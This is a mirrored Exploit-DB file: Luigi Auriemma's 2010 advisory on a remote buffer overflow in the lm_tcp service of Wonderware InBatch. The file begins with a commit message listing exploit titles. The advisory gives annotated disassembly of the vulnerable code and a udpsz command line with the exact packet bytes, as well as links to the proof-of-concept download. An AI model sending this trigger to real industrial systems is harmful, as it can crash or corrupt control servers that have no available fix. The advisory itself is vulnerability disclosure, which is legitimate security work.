bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/15707.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

111 lines
No EOL
3.8 KiB
Text
Raw Blame History

Source: http://aluigi.org/adv/inbatch_1-adv.txt
#######################################################################
Luigi Auriemma
Application: Wonderware InBatch
http://global.wonderware.com/EN/Pages/WonderwareInBatchSoftware.aspx
any other software that uses the lm_tcp server (called
"Raima Database lockmgr") like Foxboro I/A Batch
Versions: lm_tcp <= 9.0.0 0248.18.0.0 (InBatch <= 9.0sp1)
Platforms: Windows, Linux
Bug: buffer-overflow
Exploitation: remote, versus server
Date: 07 Dec 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
InBatch is a software for the industry automation sector for creating
batch processes.
#######################################################################
======
2) Bug
======
The lm_tcp service listens (manually or automatically during the
launching of "Environment Display/Manager") on port 9001 and is
vulnerable to a buffer overflow during the copying of a string in a
buffer of 150 bytes which is part of a fixed structure.
The overflow (max 19204 chars) allows only to overwrite the two memory
pointers located after the space assigned to the copying of the string
and they are immediately used for two memset(buffer, 0, 2) operations
with the consequent effect of writing a 16bit 0x0000 in an arbitrary
memory location:
00403E40 |> 8A01 /MOV AL,BYTE PTR DS:[ECX] ; strcpy
00403E42 |. 8802 |MOV BYTE PTR DS:[EDX],AL
00403E44 |. 83C1 01 |ADD ECX,1
00403E47 |. 83C2 01 |ADD EDX,1
00403E4A |. 84C0 |TEST AL,AL
00403E4C |.^75 F2 \JNZ SHORT lm_tcp.00403E40
00403E4E |. 8B4424 24 MOV EAX,DWORD PTR SS:[ESP+24]
00403E52 |. 66:8B48 12 MOV CX,WORD PTR DS:[EAX+12]
00403E56 |. 8B15 48A84000 MOV EDX,DWORD PTR DS:[40A848]
00403E5C |. 66:83E9 78 SUB CX,78
00403E60 |. 66:F7D9 NEG CX
00403E63 |. 1BC9 SBB ECX,ECX
00403E65 |. 83E1 0E AND ECX,0E
00403E68 |. 83C1 58 ADD ECX,58
00403E6B |. 898C16 98000000 MOV DWORD PTR DS:[ESI+EDX+98],ECX
00403E72 |. A1 78A84000 MOV EAX,DWORD PTR DS:[40A878]
00403E77 |. 8B0D 48A84000 MOV ECX,DWORD PTR DS:[40A848]
00403E7D |. 8B940E 9C000000 MOV EDX,DWORD PTR DS:[ESI+ECX+9C] ; first pointer overwritten
00403E84 |. 50 PUSH EAX
00403E85 |. 52 PUSH EDX
00403E86 |. E8 050C0000 CALL lm_tcp.00404A90 ; memset
00403E8B |. A1 78A84000 MOV EAX,DWORD PTR DS:[40A878]
00403E90 |. 8B0D 48A84000 MOV ECX,DWORD PTR DS:[40A848]
00403E96 |. 8B940E A0000000 MOV EDX,DWORD PTR DS:[ESI+ECX+A0] ; second pointer overwritten
00403E9D |. 50 PUSH EAX
00403E9E |. 52 PUSH EDX
00403E9F |. E8 EC0B0000 CALL lm_tcp.00404A90 ; memset
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15707.zip (udpsz.zip)
udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Reference in a new issue View git blame Copy permalink